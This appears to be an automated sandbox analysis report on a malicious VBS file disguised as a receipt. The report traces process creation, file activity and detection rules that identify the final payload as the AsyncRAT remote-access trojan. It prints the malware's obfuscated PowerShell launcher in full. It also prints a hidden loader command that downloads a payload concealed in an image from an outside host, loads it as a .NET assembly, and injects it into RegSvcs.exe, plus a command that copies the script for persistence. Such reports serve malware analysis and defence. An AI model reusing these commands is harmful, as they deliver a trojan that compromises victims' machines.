Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg			Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11181FCB	5_2_00007FFB11181FCB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11171028	5_2_00007FFB11171028
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11186A83	5_2_00007FFB11186A83
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB1117F0A5	5_2_00007FFB1117F0A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB1118739E	5_2_00007FFB1118739E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11180C0F	5_2_00007FFB11180C0F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11171010	5_2_00007FFB11171010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11171030	5_2_00007FFB11171030
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB115805A9	5_2_00007FFB115805A9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11576259	5_2_00007FFB11576259
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11585CBD	5_2_00007FFB11585CBD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB1157A8C7	5_2_00007FFB1157A8C7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11577D7D	5_2_00007FFB11577D7D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB115C0180	5_2_00007FFB115C0180
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB1157DBB2	5_2_00007FFB1157DBB2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB1158803D	5_2_00007FFB1158803D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11586C55	5_2_00007FFB11586C55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB117D5459	5_2_00007FFB117D5459
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB115841D1	5_2_00007FFB115841D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11586CAD	5_2_00007FFB11586CAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFB11570921	5_2_00007FFB11570921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_01631300	16_2_01631300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0163F2D8	16_2_0163F2D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_016339B1	16_2_016339B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_01633FA8	16_2_01633FA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0163E0F0	16_2_0163E0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_01631878	16_2_01631878

Source: E7236252-receipt.vbs

Initial sample: Strings found which are bigger than 50

Source: 16.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000010.00000002.2600656630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: powershell.exe PID: 4652, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winVBS@30/38@11/11

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2FMK3KK3\eCmZ7z04[1].txt

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3300:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\5SZ3fDyURUpUFMlG

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n3dprjsx.wq5.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\E7236252-receipt.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: E7236252-receipt.vbs	Virustotal: Detection: 17%
Source: E7236252-receipt.vbs	ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\E7236252-receipt.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1836,i,15139392700974412451,17984429462301809972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\moquenqueiro.vbs"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\moquenqueiro.vbs"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\moquenqueiro.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
